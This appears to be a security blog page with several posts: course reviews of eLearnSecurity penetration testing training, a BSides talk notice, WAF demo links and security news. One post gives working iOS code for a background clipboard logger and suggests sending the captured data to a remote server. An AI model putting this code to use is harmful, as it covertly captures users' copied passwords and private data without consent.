I will be presenting at BSidesLosAngeles. I will be going over the previous USCC Cyber Quest. Should be interesting. If your from the area make sure you get tickets soon!
http://www.securitybsides.com/w/page/36552449/BSidesLosAngeles
Simple iOS Pasteboard Logger
Filed under Research
I just went through the iGoat project released by OWASP. Some of the exercises were a bit fun. Although not very complex or in depth, they pointed out security holes and aspects of iOS technology that I was not aware of.
One of the exercises noted that a generic UIPasteboard object exists that all applications have access to unless they declare their own. I figured, hey, why not create a sort of logger that would snag the data whenever it was copied to the clipboard. Easy enough.
Here is the code. Its very simple. Not really practical considering it would never get into the app store, but fun proof-of-concept:
@implementation iSneakAppDelegate
... snip ...
- (void)applicationDidEnterBackground:(UIApplication *)application
{
dispatch_async(dispatch_get_global_queue(DISPATCH_QUEUE_PRIORITY_DEFAULT, 0), ^{
NSLog(@"starting...");
UIApplication* app = [UIApplication sharedApplication];
UIBackgroundTaskIdentifier *bgTask;
//Leave empty
bgTask = [app beginBackgroundTaskWithExpirationHandler:^{}];
NSString* string = [[UIPasteboard generalPasteboard] string];
while (true){
NSString *newString = [[UIPasteboard generalPasteboard] string];
if (![newString isEqualToString:string] && newString != nil){
NSLog(@"Pasteboard: %@",[[UIPasteboard generalPasteboard] string] );
string = [[UIPasteboard generalPasteboard] string];
}
sleep(5); //pause the loop for a few seconds
}
});
}
This is pretty straight forward. It starts a background process, giving it a blank expiration handler to ensure that the process continues forever. I then store the current value of the clipboard and begin a loop. the loop checks for any changes to the clipboard contents every 5 seconds. If it is different, it then logs it.
Obviously other things you would want to do is to setup a remote server that you could push the logged data out to. Also, UIPasteboard can have other things besides strings, so it would be nice to add some robustness to handle other forms of data.
Securing software with the Application and Front Controller Patterns
Filed under Research
I wrote an article for Infosec Institute. I went over how to develop secure software by utilizing a special application controller that funnels all user input through the appropriate validation. It essentially eliminates the likelihood of overlooking user input, and neglecting code in future updates. Very helpful for scaling applications.
Check it out:
[Review] eLearnSecurity – Professional Penetration Testing course
Filed under Reviews
I finally completed the eLearnSecurity Professional course. Before I go into the review let me outline for you how the course looks, and the context from which I will review it:
The course consists of three sections: Web Application, Network, and System. Each section is taught by a different instructor/instructors who have background in the area. Although they follow a similar presentation, I was surprised at how different the learning experience would be in each section. Based on what I took from the class, as well as what I have read from their marketing and discussed with their owner, here are the things that the eLearnSecurity Professional course tries to provide for their students:
- Real world penetration testing skills (Fantastic)
- Penetration testing process (So so)
- Up-to-date information (Great)
- CEH level of depth (Superb)
I would say that the course measured up to about 90% of that, which is pretty dang good when you consider a lot of the hacking courses out there. Now, my experience with most of my certifications involved a curriculum book and a review book. From there I would take the test and hoped I part. So when I review this course I am assuming that the user is in a similar situation and is looking at eLearnSecurity as an alternative.
Web Application
In my opinion this was the best section. I really started my pen testing at the web app level.
- Pros: I felt like the instructor did a great job at presenting the information in a clear to understand manner. The information took me deeper into the technology than traditional CEH level training, which tends to keep you at a “script kiddie” level of complexity. Although the instructor took time to explain some underlying technology, he also did not overwhelm you with it. While most trainings take you as far as XSS and SQLI, eLearnSecurity then presses you into CSRF, HTTP Header Injection, RFI, and more. I was even more impressed when he explained about exploit chaining. As with their Student course, they did a fantastic job at not overwhelming you with tools, but helped you focus on one or two key tools that are prominent in the field today; not some antiquated script from the 90′s. The interactive slides made it easy to follow along and easy to understand the anatomy of the payloads. In addition to that, the instructor teaches the student how to completely case a web application and record findings that could be organized enough for a team of testers and eventually help create a test report.
- Cons: I dont have any real qualms with the content. However, I do wish that a more exercise based approach could have been done. I need to be fair and state that there were quite a few exercises involving Burp Suite and Wireshark, however the other tools were neglected. I can understand the difficulty of setting up a virtual lab environment and distributing it on an iso. By no means did I feel like my learning experience was wasted without such a lab, but at the same time I can imagine a less-informed student struggling a bit more without a hands on walkthrough available. Thats my only gripe about the web app section. Other than that is was fantastic!
[EDIT] The eLearnSecurity guys provide a free two week access pass to their Web Application Coliseum which provides a mission oriented lab to try out your web application hacking skills [/EDIT]
Network
- Pros: Network penetration testing is a hard thing to teach. It usually requires a fairly extensive lab environment with simulated networking equipment and systems in order to do justice to the possibilities out there. The instructor of this section did a very nice job presenting some of the basic principles of network hacking. He mostly covered the enumeration and exploitation of windows and NetBIOS related technologies. He also explained about host discovery, port scanning and SNMP. I felt like the information that was presented was done so clearly and concise enough to help less network savvy individuals keep on target. The nature of network attacks also made it easy for the instructor to outline the basic hacking process from information gathering to establishing persistence.
- Cons: I guess I was pretty spoiled after the other two sections, but I was expecting this section to give me an extra zing like the System and Web App sections did. Dont get me wrong, he covered pretty much everything that is talked about in the CEH. I guess I was just spoiled by the rest of the course
(thats a good thing, right?). I really wanted to see some more depth here. I understand the difficulty of going too deep too quickly when it comes to networks, but perhaps some more content could be added in a few other ways? For instance, going over the ICMP protocol in details is actually a very helpful thing to know.
System
- Pros: You can definitely tell that the instructors of this section know what they are talking about. Although my background in system hacking (Buffer Overflows, ASM, etc) should be considered only fair, I feel like I can give a fairly good assessment of this section as being quite helpful. I have watched and read many “intro” guides to these complex topics, but I felt that the eLearnSecurity instructions were some of the easiest to understand. To top it off, this section has amazing hands on examples and exercises that I had been really wanting in this course. I became even more blown away when the instructors took us into Shellcode creation, malware techniques, and rootkit development. I was getting a little worried that some of the basics of systems hacking were being ignored (like ADS), but sure enough they came up. This section was quite superb and is sure to be a section I would refer to often.
- Cons: Due to the nature of the topic im not sure it would be fair to call it a con, however I guess it should be said. There were some points during the more advanced sections where I felt very lost. But like I said, how can I expect them to teach a student all of the subtleties of the Windows kernel and APIs? So with that being said, I wouldn’t say its a con, just more of a steep learning curve that would require outside reading to fully understand. Maybe they could provide some good resources?
Overall this course was very good. How does it compare to the CEH? Well, it covers pretty much everything the CEH intends to cover. Some little things were left out (like the before mentioned ICMP stuff, etc), but I felt this course does a much better job at teaching you the skills used in penetration testing. One let down was that the pen testing methodology was only covered weakly. One thing the CEH did do well was ensure your understanding of the stages of hacking. After that the ECSA then helped with more organizational aspects of conducting a penetration test. However, if you were to take both the Student and the Professional course, you would get a very thorough understanding of the pen test process, as well as techniques that would get you on your way to becoming a skilled tester. I would still would like to see a lab VM shipped with the course that came loaded with tools and services to test the Web App and Network type stuff on.
In conclusion, I very much enjoyed these courses. They were quite informative. They did have some grammatical issues and some of the slides were a bit mundane, but try reading the “ISC2 Official Guide to the CISSP CBK” and then you can talk to me about mundane reading. Although the courses were not perfect and the price could be hard for some, I would have to agree that eLearnSecurity better provides the skill set that you would hope to get from many other ethical hacking courses out there, specifically the CEH. Remember, these courses are not meant to be In-Class trainings so dont expect them to be. Also, a certification is included in the course (and the cost, which usually is like 250$ for any other cert), and although I have not taken it, I anticipate that its reality based test wont let you down. So bravo to the guys at eLearnSecurity. Keep up the good work, I am eager to see how even better the course turns out to be in a few years.
ModSecurity Demo Projects: VirusTotal of WAF
Filed under Tools
For those looking for a place to test their Web App payloads, check out the ModSecurity demo pages. They offer a WAF equivalent to VirusTotal.
Check it out here
EDIT:
PHPIDS has one as well - https://demo.phpids.org/
Linux Shells With Built In Tools
Filed under Fu (a.k.a Tips), Weaponizing /bin/sh
I love posts like these, 7 linux shells using only built in tools!
[Review] eLearnSecurity – Penetration Testing Student Course
Filed under Reviews
A while back I had posted a reader’s opinion on the eLearnSecurity Online Penetration Testing Course. For those of you who have read it, you will remember that is was fairly negative. As a result, the owners of eLearnSecurity have offered me the opportunity to view the entire suite of their courses in return for a review of my own. This is the first of three reviews, this one focusing on the Student level course.
I would first like to lay some “ground rules” that are important to understand when giving a fair review.
- Target Audience – To accurately assess the quality of training we need to understand that there are different levels of audiences that may view the actual content. For this reason more experienced viewers will be less stimulated by the learning than someone with less experience. Therefore, we must approach the review from the standpoint of the target audience.
- Medium – We must also consider the median (i.e, Videos, In-Class, Online, etc). This too has a major effect on the learning, and should only be compared amongst similar medians.
- Claims – More than the others even, we must only expect to take away from the course what the trainers claim to provide. It would be quite unfair to not take this into account.
The Setting
eLearnSecurity provides their “Student” level course for those brand new to the field. Through emails it was not made completely clear to me how novice these students would be. However, through the content of the course it was fairly clear that they did not expect a whole lot of technical background from their target audience, but would provide the groundwork for them.
The purpose of the course is to prepare the student to take the “Professional” level course, which I have intentionally not gone over yet. From reading other reviews and advertisements I know that their main course is meant to be the “CEH Killer”. So when reviewing this “Student” course I will approach it from one who would be looking to lay a foundation for undertaking a CEH level course.
The Review
I will start off saying that doing this review was actually quite difficult. Because my level of understanding is beyond that of the target audience, it made it difficult to assess whether or not certain areas were covered in depth and clear enough. However, I believe I have done a fairly good job of putting myself into a novice’s shoes.
When you start the course you are presented with two choices, “Preliminary Skills”, and “Penetration Testing”. I began from the very beginning focusing on the Preliminary Skills. I think they did a fairly good job at presenting the base understanding necessary to comprehend penetration testing and its required skills. Because of the nature of hacking and pen testing, the necessary skill set to really delve into the industry requires an immense amount of technical background in all different IT related fields. This course provides a very basic outline of those skills. I don’t know if I personally could say for certain that their Preliminary Skills portion is perfect in providing this background. However, I believe that it probably does an adequate job to prepare the student for the Penetration Testing portion of the course. I found it quite refreshing to find a training resource that did more than just instruct you to do personal research of prerequisite skills.I will say that students should take time to read and study the recommended reading found at the end of each section.The part I appreciated most of the Preliminary Skills portion was the fact that they explain to us why each skill (routing, protocols, etc) is important, how it will help with penetration testing, and what hacking skill it supports. This definitely encouraged me to gain better understanding of the topic and put the skill into context. Overall I think the preliminary skill index was well done and quite useful. But like I said, I would not recommend it (nor would they claim it) as the sole source of learning for a complete IT novice.
The Penetration Testing slide portion of the Student course was quite fantastic in my opinion. However, the lab portion was a let down. The lab setup provided was not really used, nor is there specific tasks assigned or instructions provided on how to execute any sort of “assignments”. The setup was simply BackTrack and Metasploitable. What I would like to have seen was specific tasks and perhaps walkthroughs on how to do these specific attacks in the lab environment. However, I understand that this course is almost entirely theoretical in nature. Heck, the CEH is even less hands-on unless you take an In-Class prep course. So I believe it is fairly reasonable to expect the eLearnSecurity courses to fall somewhere in between self-study and in-class when it comes to hands-on training. I should also mention that the videos are presented in a way to permit a “follow along”, so there is some limited hands-on available.
The content of the Penetration Testing slides were great. They wont overwhelm a novice with a list of a million tools, they focused on those most commonly used today by Pen Testers. In addition, the videos provided were detailed, clear and thorough. Things were more clearly explained than I had learned in the past and certain things were taught which I had never seen covered at that level before. They cover a broad range of attacks and give a great base to build further Penetration Testing courses off of.
Now, some people got upset about the course medium itself. Yes, the course is a large collection of slides and videos. However, I don’t think that is unreasonable nor does it make it ineffective. True, certain things could have been better done; Not all of the slides had voice, some were plain and bland, etc. However, overall I think that the slides and the interaction available in a good portion of them allows you to learn better than in a self-study book.
In Conclusion
I think this course is a great beginners course. I would recommend this course as a sort of Security+ level of Penetration Testing. I will say that ff you are looking for an experience like you would get in an classroom environment, than you may be let down. But that’s not what this course claims to be. In my opinion, this is the perfect way to do a self-study course opposed to traditional books that are out there. Coming from a guy who has done all of his certifications via self-study and books, I can tell you that if I had something more interactive like this then my certifications would have been much more enjoyable to attain.
Stay tuned for reviews of the Professional level course as well as their Web Application Coliseum.
United States Solidifies Cyber ROE
Filed under News
This story was posted on packetstorm this morning and is probably being under appreciated in terms of its ground breaking impact. For some time now we have understood that “acts of cyber aggression” aimed towards a country would be considered an act of war. However, defining an appropriate course of reaction has been the topic of debate for some time. With the President’s new policy we have finally settled that by stating “When warranted, the United States will respond to hostile acts in cyberspace as we would to any other threat to our country,”. You can read the entire story here, and the actual White House policy here.
I could be jumping the gun on this, but to me it seems that the President has authorized and committed the U.S Military to take cyber threats more seriously than before.
A Good Lesson By Barracuda Labs
Filed under Defense, Fu (a.k.a Tips)
Barracuda Labs puts out many popular security devices and other defensive solutions. They have recently suffered a SQL injection attack on their site that compromised some of their email contacts. Here is their official posting and dissection of the attack.
The important lesson to be learned here is not necessarily how the attack was done or how it was detected. The important thing is identifying why the attack was able to happen at all. Many people would overlook a single fault like an unsanitized input field, or a misconfigured WAF, etc. On their own these issues may be dangerous for a smaller organization, but a larger organization may overlook the attack surface that each of these weaknesses creates when they are aggregated.
